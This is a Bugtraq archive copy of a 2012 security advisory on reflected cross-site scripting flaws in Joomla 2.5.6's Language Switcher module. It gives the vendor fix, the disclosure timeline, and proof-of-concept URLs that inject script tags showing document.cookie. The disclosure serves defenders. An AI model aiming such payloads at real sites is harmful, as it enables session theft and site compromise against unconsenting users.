Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Joomla 2.5.6 Multiple Cross-site scripting vulnerabilities

From: sschurtz () darksecurity de
Date: Tue, 18 Sep 2012 20:27:49 GMT
Advisory:               Joomla 2.5.6 Multiple Cross-site scripting vulnerabilities
Advisory ID:            SSCHADV2012-014
Author:                 Stefan Schurtz
Affected Software:      Successfully tested on Joomla 2.5.6
Vendor URL:             http://www.joomla.org/
Vendor Status:          fixed

==========================
Vulnerability Description
==========================

With activated "Module Language Switcher . position-4" (Extensions -> Modules -> Module Manager: Module Language 
Switcher), multiple XSS are possible.

==================
PoC-Exploit
==================

// with default sample content

http://[target]/joomla/index.php/image-gallery/";><script>alert(document.cookie)</script>/25-koala
http://[target]/joomla/index.php/image-gallery/";><script>alert('xss')</script>/25-koala

http://[target]/joomla/index.php/image-gallery/animals/25-";><script>alert(document.cookie)</script>
http://[target]/joomla/index.php/image-gallery/animals/25-";><script>alert('xss')</script>

=========
Solution
=========

Upgrade to version 2.5.7

====================
Disclosure Timeline
====================

28-Jun-2012 - vendor informed (security () joomla org)
05-Jul-2012 - vendor informed again (security () joomla org)
13-Sep-2012 - fixed by vendor

========
Credits
========

Vulnerabilities found and advisory written by Stefan Schurtz.

===========
References
===========

http://developer.joomla.org/security/news/540-20120902-core-xss-vulnerability
http://www.darksecurity.de/advisories/2012/SSCHADV2012-014.txt
Previous By Date Next
Previous By Thread Next

Current thread: